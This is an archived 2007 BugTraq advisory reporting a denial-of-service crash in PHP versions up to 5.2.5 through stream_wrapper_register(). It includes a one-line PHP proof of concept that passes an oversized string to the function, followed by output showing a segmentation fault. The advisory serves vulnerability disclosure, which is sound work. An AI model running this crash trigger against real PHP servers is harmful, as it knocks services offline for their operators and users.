BugTraq
PHP <= 5.2.5 stream_wrapper_register() denial of service Nov 13 2007 07:47PM
laurent gaffie gmail com
Application: PHP <= 5.2.5

Web Site: http://php.net

Platform: unix

Bug: Denial of service

fonction: stream_wrapper_register()

special condition: default php-memory-limit

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Greets

5) Credits

===========

1) Introduction

===========

"PHP is a widely-used general-purpose scripting language that

is especially suited for Web development and can be embedded into HTML."

======

2) Bug

======

stream_wrapper_register() is vulnerable to a denial of service

=====

3)Proof of concept

=====

Proof of concept example :

<?php

stream_wrapper_register("hi",str_repeat("A",8477000));//let's make sure we trigger it !

?>

result:

root@unsafebox:~/Desktop# php shot.php

Erreur de segmentation (core dumped)

root@unsafebox:~/Desktop#

========

4)Greets

========

Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh

=====

5)Credits

=====

laurent gaffié

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus